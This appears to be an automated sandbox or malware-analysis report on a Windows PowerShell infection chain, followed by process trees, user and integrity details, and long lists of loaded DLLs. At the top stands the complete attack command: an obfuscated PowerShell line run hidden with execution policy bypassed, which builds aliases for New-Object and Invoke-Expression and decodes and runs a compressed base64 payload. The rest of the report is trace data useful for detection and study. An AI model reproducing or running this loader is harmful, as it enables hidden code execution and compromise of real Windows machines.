POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX
Path
C:\WINDOWS\System32\WindowsPowerShell\v1.0\POWeRsHEll.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\combase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\gpapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\uxtheme.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\windowsbase\8604bd365c35cb553eff5fc8fd67fd19\windowsbase.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\presentationcore\62b9468240b1680a41ae0b06684c40d5\presentationcore.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\presentatio5ae0f00f#\3eca476a270a2cb119f487c890810379\presentationframework.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xaml\753248c2082aaa25ba3f3b64f8f24362\system.xaml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml.linq\b59428c2a855f7044b339e8206043346\system.xml.linq.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\microsoft.net\assembly\gac_64\microsoft.visualbasic.activities.compiler\v4.0_10.0.0.0__b03f5f7f11d50a3a\microsoft.visualbasic.activities.compiler.dll
c:\windows\system32\msvcp120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\microsoft.v9921e851#\94a3f05ae4dab0ff71443505d0ee300b\microsoft.visualbasic.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.enterpriseservices\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.enterpriseservices.dll
c:\windows\microsoft.net\assembly\gac_64\system.enterpriseservices\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.enterpriseservices.wrapper.dll
c:\windows\system32\ntmarta.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.runteb92aa12#\509b15a107dedcf707e7cd6e17e061cd\system.runtime.serialization.ni.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrcompression.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll

PID
5540
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\dwmapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\textinputframework.dll
c:\windows\system32\coreuicomponents.dll
c:\windows\system32\coremessaging.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wintypes.dll
c:\windows\system32\clbcatq.dll

PID
1924
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
3848
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
